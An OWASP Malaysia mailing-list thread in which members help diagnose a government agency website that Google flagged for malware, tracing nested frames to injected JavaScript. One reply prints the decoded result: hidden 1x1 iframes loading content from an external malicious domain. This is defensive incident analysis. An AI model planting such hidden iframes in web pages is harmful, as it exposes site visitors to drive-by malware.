I can see 2 interesting apps/scripts: 1. mamp 2. /opt/analysis/js/js
care to share? hopefully it is open source ;) On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor < [email protected]> wrote: > Here is my bash history: > > xanda:tmp adnan$ history > <snip> > 500 cd /tmp > 501 wget http:/www2.pkink.gov.my/indexsedc.php > 502 wget http://www2.pkink.gov.my/indexsedc.php > 503 nano indexsedc.php > 504 wget http://www2.pkink.gov.my/indexsedc.php > 505 mamp indexsedc.php.1 > 506 nano indexsedc.php.1 > 507 wget http://www2.pkink.gov.my/sedc.php > 508 nano sedc.php > 509 wget http://www2.pkink.gov.my/default.php > 510 nano default.php > 511 nano default.php > 512 clear > <I've remove tags and leave clean JavaScript inside> > 513 mv default.php default.txt > 514 /opt/analysis/js/js < default.txt > 515 cat write.log > 516 history > xanda:tmp adnan$ > > Below is the output of the cat: > [output] > xanda:tmp adnan$ cat write.log > <iframe width="1" height="1" > src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== > "></iframe>"<iframe > width="1" height="1" > src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== > "></iframe>" > [/output] > > > Hint: you might use modified version of spidermonkey to 'understand' > the javascript > > Thanks > > On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> wrote: > > thanks for the info.. > > i will check all the file. > > > > how you found it? > > > > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor > > <[email protected]> wrote: > >> > >> Here is the flow: > >> > >> 1) your indexsedc.php has an iframe to sedc.php > >> 2) and your sedc.php has an iframe to default.php > >> 3) and in default.php (look at the last 2 lines), javascript will > >> actually create an iframe to > >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== > >> > >> thanks :) > >> > >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> wrote: > >> > can you point... > >> > my index.htm or indexsedc.php or other file? > >> > > >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor > >> > <[email protected]> wrote: > >> >> > >> >> you have iframe pointed to > >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== > >> >> > >> >> which is not xss :) > >> >> > >> >> >From my personal point of view, its either caused by: > >> >> 1) malware on pc which has been used for ftp/access to the server > >> >> 2) compromised server > >> >> > >> >> you can send your access.log to [email protected] or > >> >> [email protected] for further analysis :) > >> >> > >> >> thanks > >> >> > >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> wrote: > >> >> > I have check it. > >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <[email protected]> > >> >> > wrote: > >> >> >> > >> >> >> Hi Mohd Symsuri, > >> >> >> > >> >> >> Why dont you check on the reason why its being blocked, it might > >> >> >> help. > >> >> >> > >> >> >> > >> >> >> > >> >> >> > >> >> >> > http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/ > >> >> >> > >> >> >> > >> >> >> > >> >> >> > >> >> >> > http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788 > >> >> >> > >> >> >> Regards, > >> >> >> Kishur > >> >> >> > >> >> >> > >> >> >> > >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri < > [email protected]> > >> >> >> wrote: > >> >> >>> > >> >> >>> Assalamualikum and Good day for my fellow friends. > >> >> >>> I need some advise. > >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan > >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for almost > 4 > >> >> >>> days. > >> >> >>> It said that we host malware on our server Malware Detected! ( > >> >> >>> Google > >> >> >>> said that!!) > >> >> >>> What i did is.. > >> >> >>> 1. Scan all the data and upload a new data > >> >> >>> 2. Check the index.html or index.php > >> >> >>> 3. Scan using web scanner using > >> >> >>> http://www.avgthreatlabs.com/ > >> >> >>> http://www.virustotal.com > >> >> >>> but still get block.. > >> >> >>> Googel said Suspected injected code > >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"; > >> >> >>> NAME="confcontent" > >> >> >>> scrolling=yes > > >> >> >>> I have using this code for almost 2 years > >> >> >>> What should i do now? > >> >> >>> > >> >> >>> -- > >> >> >>> best regard > >> >> >>> syamsuri > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> _______________________________________________ > >> >> >>> Owasp-Malaysia mailing list > >> >> >>> [email protected] > >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >> >> >>> > >> >> >>> OWASP Malaysia Wiki > >> >> >>> http://www.owasp.org/index.php/Malaysia > >> >> >>> > >> >> >>> OWASP Malaysia Wiki Facebook > >> >> >>> > >> >> >>> > >> >> >>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >> >> >> > >> >> >> > >> >> >> _______________________________________________ > >> >> >> Owasp-Malaysia mailing list > >> >> >> [email protected] > >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >> >> >> > >> >> >> OWASP Malaysia Wiki > >> >> >> http://www.owasp.org/index.php/Malaysia > >> >> >> > >> >> >> OWASP Malaysia Wiki Facebook > >> >> >> > >> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >> >> > > >> >> > > >> >> > > >> >> > -- > >> >> > best regard > >> >> > syamsuri > >> >> > > >> >> > > >> >> > > >> >> > _______________________________________________ > >> >> > Owasp-Malaysia mailing list > >> >> > [email protected] > >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >> >> > > >> >> > OWASP Malaysia Wiki > >> >> > http://www.owasp.org/index.php/Malaysia > >> >> > > >> >> > OWASP Malaysia Wiki Facebook > >> >> > > >> >> > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >> >> > > >> >> _______________________________________________ > >> >> Owasp-Malaysia mailing list > >> >> [email protected] > >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >> >> > >> >> OWASP Malaysia Wiki > >> >> http://www.owasp.org/index.php/Malaysia > >> >> > >> >> OWASP Malaysia Wiki Facebook > >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >> > > >> > > >> > > >> > -- > >> > best regard > >> > syamsuri > >> > > >> > > >> > > >> > _______________________________________________ > >> > Owasp-Malaysia mailing list > >> > [email protected] > >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >> > > >> > OWASP Malaysia Wiki > >> > http://www.owasp.org/index.php/Malaysia > >> > > >> > OWASP Malaysia Wiki Facebook > >> > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >> > > >> _______________________________________________ > >> Owasp-Malaysia mailing list > >> [email protected] > >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >> > >> OWASP Malaysia Wiki > >> http://www.owasp.org/index.php/Malaysia > >> > >> OWASP Malaysia Wiki Facebook > >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > > > > > > > > -- > > best regard > > syamsuri > > > > > > > > _______________________________________________ > > Owasp-Malaysia mailing list > > [email protected] > > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > > > OWASP Malaysia Wiki > > http://www.owasp.org/index.php/Malaysia > > > > OWASP Malaysia Wiki Facebook > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > > > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > -- Sharuzzaman Ahmat Raslan
_______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
